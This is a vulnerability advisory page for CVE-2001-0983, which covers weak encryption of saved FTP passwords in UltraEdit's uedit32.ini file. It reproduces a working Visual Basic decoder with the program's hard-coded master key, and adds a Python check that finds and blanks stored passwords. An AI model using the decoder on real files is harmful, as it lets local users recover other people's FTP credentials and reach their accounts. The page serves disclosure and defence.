UltraEdit uedit32.ini FTP Password Disclosure and Privilege Escalation Vulnerability

Vulnerability ID: 1106471
Vulnerability type: Unknown
Published: 2001-08-23
Updated: 2001-08-31
CVE ID: CVE-2001-0983
CNNVD-ID: CNNVD-200108-158
Platform: Windows
CVSS score: 4.6
|Vulnerability source
https://www.exploit-db.com/exploits/21091
https://www.securityfocus.com/bid/89122
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200108-158
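|Vulnerability details
UltraEdit uses weak encryption when it records FTP passwords in the uedit32.ini file. A local user who can read the file can exploit this vulnerability to decode the passwords and gain privileges.
|Exploit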
source: http://www.securityfocus.com/bid/3234/info

UltraEdit is a multi-featured commercial text editor with support for HTML, C/C++, VB, Java, Perl, XML, and C#. It also includes a hex editor and a small FTP client.

UltraEdit's FTP client has a feature which will remember FTP passwords for later use. When passwords are remembered they will be stored on the system using an "admittedly" weak encryption algorithm. As a result, it is a fairly trivial task to decrypt the passwords for FTP accounts.

Successful exploitation of this vulnerability will allow a local attacker to gain unauthorized access to the FTP sites used by other local users.

The following VB code decodes the FTP account passwords stored in uedit32.ini:


' UltraEdit FTP password decryption (stored in uedit32.ini)
'
' Taken from the help-file:
'
' This checkbox determines if UltraEdit will save the password for later
' reference. If not the user will be prompted for the password as required. Note
' - if the password is saved it is stored on the system. It is encrypted however
' the encryption mechanism is unsophisticated and should not be relied upon as a
' method of security.

' Masterkey. Taken from the UltraEdt.exe
Private Const Masterkey As String = "sdfkh we;34u[ jwef "

' Decode a single character.
' i_Asc is the stored byte value, i_Pos its 1-based position in the password.
Public Function UEDecode(ByVal i_Asc As Integer, ByVal i_Pos As Integer) As Integer
    Dim keyByte As Integer

    ' The 19-character key repeats: map the position onto 1..19
    i_Pos = i_Pos Mod 19
    If i_Pos = 0 Then i_Pos = 19
    keyByte = Asc(Mid$(Masterkey, i_Pos, 1))

    ' The two terms share no bits, so the sum equals (i_Asc Xor keyByte) And 127
    UEDecode = ((Not i_Asc) And keyByte) + (i_Asc And ((Not keyByte) And 127))
End Function

' Decode password: the stored value is a hex string, two digits per character
Public Function UEDecodeString(ByVal str_password As String) As String
    Dim i As Integer

    UEDecodeString = ""

    For i = 1 To Len(str_password) \ 2
        UEDecodeString = UEDecodeString & Chr$(UEDecode(Val("&H" & Mid$(str_password, (2 * (i - 1)) + 1, 2)), i))
    Next i
End Function
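
A defender-side check, added here as an example (not code from the advisory or from UltraEdit): it lists the uedit32.ini entries that hold a saved password, which the decoder on this page shows are stored as hex pairs, and returns a copy of the file with those values blanked. The key-name pattern and the sample section and key names are assumptions, since the page does not give the file's real key names.

```python
import re

# Assumption: keys whose name contains "pass" hold the saved FTP password
# (the page does not list the real uedit32.ini key names).
KEY_RE = re.compile(r"pass", re.IGNORECASE)
# The decoder on this page reads the stored value two hex digits per character.
HEX_PAIRS_RE = re.compile(r"(?:[0-9A-Fa-f]{2})+")

def find_saved_passwords(ini_text):
    """Return (line_no, section, key, password_length) for each stored password."""
    findings, section = [], ""
    for line_no, raw in enumerate(ini_text.splitlines(), start=1):
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        if line.startswith(";") or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        if KEY_RE.search(key) and HEX_PAIRS_RE.fullmatch(value):
            # Report only the length; the stored value is never echoed.
            findings.append((line_no, section, key, len(value) // 2))
    return findings

def scrub_saved_passwords(ini_text):
    """Return the INI text with every stored password value blanked."""
    flagged = {line_no for line_no, *_ in find_saved_passwords(ini_text)}
    out = []
    for line_no, raw in enumerate(ini_text.splitlines(), start=1):
        if line_no in flagged:
            raw = raw.split("=", 1)[0] + "="
        out.append(raw)
    return "\n".join(out) + "\n"

# Constructed sample: section and key names are illustrative, values are made up.
SAMPLE_INI = """\
[FTP Account 1]
Server=ftp.example.test
Username=alice
Password=1A2B3C4D5E
[FTP Account 2]
Server=ftp.example.test
Username=bob
Password=
"""

if __name__ == "__main__":
    for line_no, section, key, length in find_saved_passwords(SAMPLE_INI):
        print(f"line {line_no}: [{section}] {key} stores a {length}-character password")
```

Any FTP password found this way should also be changed on the server, because a local user who could read the file may already have decoded it.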
|Affected products
Ultraedit Ultraedit-32 0
|References

Source: www.eve-software.com
Link: http://www.eve-software.com/security/ueditpw.html
Source: BUGTRAQ
Name: 20010823 Re: Respondus v1.1.2 stores passwords using weak encryption
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=99861651923668&w=2
